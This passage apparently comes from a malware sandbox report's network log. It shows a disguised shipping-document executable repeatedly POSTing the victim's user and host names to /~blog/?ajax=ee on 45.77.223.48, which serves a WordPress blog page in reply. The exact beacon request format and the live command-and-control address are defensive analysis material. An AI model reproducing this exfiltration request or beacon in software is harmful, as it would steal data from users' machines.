                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:24.978173971 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:25.006469965 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:25.009780884 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:25.009793043 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:25.009803057 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.44977145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:25.250535965 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:25.381947041 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:26.197526932 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:25 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:26.197863102 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:26.197973967 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:26.206537008 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:26.206547976 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:26.206597090 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:26.206752062 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:26.206873894 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:26.206955910 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:26.207056999 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.44977245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:26.688177109 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:26.819386959 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:27.655317068 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:26 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:27.655333996 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:27.655489922 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:27.663259029 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:27.663711071 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:27.663721085 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:27.663829088 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:27.663921118 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:27.664079905 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:27.664182901 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.44977345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:28.624649048 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:28.750395060 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:29.653106928 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:28 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:29.653162003 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:29.653328896 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:29.653413057 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:29.653556108 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:29.667067051 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:29.673437119 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:29.673597097 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:29.673751116 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:29.673885107 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.44977445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:29.915605068 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:30.041357040 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:30.838670969 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:29 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:30.838778973 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:30.838813066 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:30.838910103 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:30.838983059 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:30.848464966 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:30.848826885 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:30.848984957 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:30.849061966 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:30.849200964 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.44977545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:31.102796078 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:31.228517056 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:32.062141895 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:31 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:32.062201977 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:32.062460899 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:32.062566042 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:32.062864065 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:32.071769953 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:32.072137117 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:32.072247028 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:32.072329998 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
